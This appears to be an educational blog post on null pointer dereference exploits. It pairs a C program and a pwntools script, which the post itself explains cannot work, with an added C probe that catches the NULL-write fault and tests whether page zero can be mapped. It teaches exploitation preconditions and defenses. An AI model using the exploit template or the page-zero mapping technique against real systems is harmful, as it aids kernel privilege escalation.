strangerRidingCaml

8. Null Pointer Dereference Exploits

Linux kernel exploit

woddlwoddl 2024. 5. 12. 03:03
Null Pointer Dereference Exploits

A null pointer dereference occurs when a program reads or writes memory through a pointer that holds NULL (address 0) or a small offset from it, for example a field of a structure whose base pointer is NULL. In userspace on Linux the result is a SIGSEGV and the process dies, so on its own the bug is a denial of service. It becomes a way to control execution only when the attacker can arrange for memory of their choosing to be mapped at the faulting address. That is the classic kernel case: if page zero can be mapped from userspace and the kernel calls through a NULL function pointer, the kernel jumps into attacker-controlled code. The vm.mmap_min_addr sysctl (65536 by default) and the SMEP/SMAP CPU features exist to shut that path down.

Lab Activity: Null Pointer Dereference Exploit

In this lab activity we look at a small C program that writes through a pointer, see what happens when that pointer is NULL, and then examine why the pwntools script below does not turn that crash into control of execution.

Defender Side Code:


#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(int *ptr) {
    if (ptr != NULL) {   // Guard: with this check present the NULL case is skipped
        *ptr = 42;       // Without the check, this store to address 0 raises SIGSEGV
    }
}

int main(void) {
    int *ptr = NULL;           // The pointer is never assigned a valid object
    vulnerable_function(ptr);  // Passes NULL; the guarded version returns without writing
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):


from pwn import *

# Address of vulnerable_function in the compiled binary
# (example address: read the real one with `nm vulnerable_program` or in gdb)
vulnerable_function_addr = 0x004005f7

# Pack the address as a little-endian 8-byte value, the form a saved return
# address takes on x86-64. Note that the program above never reads input,
# so there is nothing in it that these bytes can overwrite.
payload = p64(vulnerable_function_addr)

# Start the vulnerable program as a child process
p = process("./vulnerable_program")

# Write the payload to the program's stdin; the program exits without reading it
p.sendline(payload)

# Hand the terminal over to the child process (which has already exited)
p.interactive()

The script packs the address of vulnerable_function with p64, starts the program, writes those bytes to its stdin, and drops into an interactive session. That is the shape of a return-address overwrite for a stack buffer overflow, and it does nothing here: vulnerable_program never reads stdin, there is no buffer to overflow, and a write through NULL cannot be redirected from outside the process. Running it gives either a normal exit (the guard skips the write) or, with the guard removed, a SIGSEGV at address 0; in neither case does control of execution change hands. To see what actually happens, run the binary under gdb, or install a SIGSEGV handler and compare the si_addr it reports with the address the program tried to write. A null pointer dereference turns into an exploit only when address 0 (or the offset being dereferenced) can be made to hold attacker-controlled memory, which is why historical kernel exploits of this class began by mapping page zero and why mmap_min_addr blocks that on current systems.
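The crash and the precondition described above, as an added C example that is not part of the original post: probe_null_write() performs the unguarded write through NULL under a SIGSEGV handler and reports that it faulted instead of dying, guarded_write() is the checked version that returns a status instead of silently skipping the write, and try_map_page_zero() asks the kernel for the page at address 0, the step a historical kernel NULL-pointer exploit needed and the one vm.mmap_min_addr refuses on a default system. All function names are my own; the 4096-byte page size and the expectation of EPERM from the mmap are assumptions about a default x86-64 Linux.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Added example (not the blog's code): what a userspace write through NULL
 * really does, and the precondition that decides whether a NULL dereference
 * is anything more than a crash. */

static sigjmp_buf fault_env;
static volatile sig_atomic_t fault_signal;
static void *volatile fault_addr;

/* Catch the fault, remember the signal and faulting address, jump back out. */
static void fault_handler(int sig, siginfo_t *info, void *ctx) {
    (void)ctx;
    fault_signal = sig;
    fault_addr = info ? info->si_addr : NULL;
    siglongjmp(fault_env, 1);
}

static int install_fault_handler(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = fault_handler;
    sa.sa_flags = SA_SIGINFO | SA_NODEFER;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, NULL) != 0) return -1;
    if (sigaction(SIGBUS, &sa, NULL) != 0) return -1;
    return 0;
}

/* The unguarded version of vulnerable_function. Returns 1 if the store faulted,
 * 0 if it somehow succeeded, -1 if the handler could not be installed. The
 * pointer variable is volatile so the compiler cannot see that it is NULL and
 * replace the store with a trap instruction. */
int probe_null_write(void) {
    if (install_fault_handler() != 0) return -1;
    int *volatile ptr = NULL;
    fault_signal = 0;
    if (sigsetjmp(fault_env, 1) == 0) {
        *ptr = 42;      /* the dereference the page describes: a store to address 0 */
        return 0;
    }
    return 1;           /* siglongjmp landed here: the write faulted */
}

/* The guarded version: same check as the blog's vulnerable_function, but it
 * reports -1 for a NULL pointer instead of silently doing nothing. */
int guarded_write(int *ptr, int value) {
    if (ptr == NULL) return -1;
    *ptr = value;
    return 0;
}

/* Exploitability precondition: can this process map the page at address 0?
 * A kernel NULL function-pointer dereference is attacker-controlled only if
 * something of the attacker's sits at address 0; vm.mmap_min_addr refuses this
 * mapping for unprivileged processes. Returns 0 on success, otherwise errno
 * (EPERM is the expected result on a default system; assumed 4096-byte page). */
int try_map_page_zero(void) {
    void *p = mmap((void *)0, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED) return errno;
    munmap(p, 4096);
    return 0;
}

int main(void) {
    int x = 0;
    printf("guarded_write(NULL) -> %d, guarded_write(&x) -> %d, x = %d\n",
           guarded_write(NULL, 42), guarded_write(&x, 42), x);
    printf("unguarded write through NULL faulted: %d (signal %d, address %p)\n",
           probe_null_write(), (int)fault_signal, (void *)fault_addr);
    int rc = try_map_page_zero();
    printf("mmap of page zero: %s\n", rc == 0 ? "allowed" : strerror(rc));
    return 0;
}
```

On a stock system the last line reads "Operation not permitted"; if it ever reads "allowed", the process can place its own bytes at the address a NULL function pointer would jump to, which is exactly the condition the mmap_min_addr check was introduced to deny.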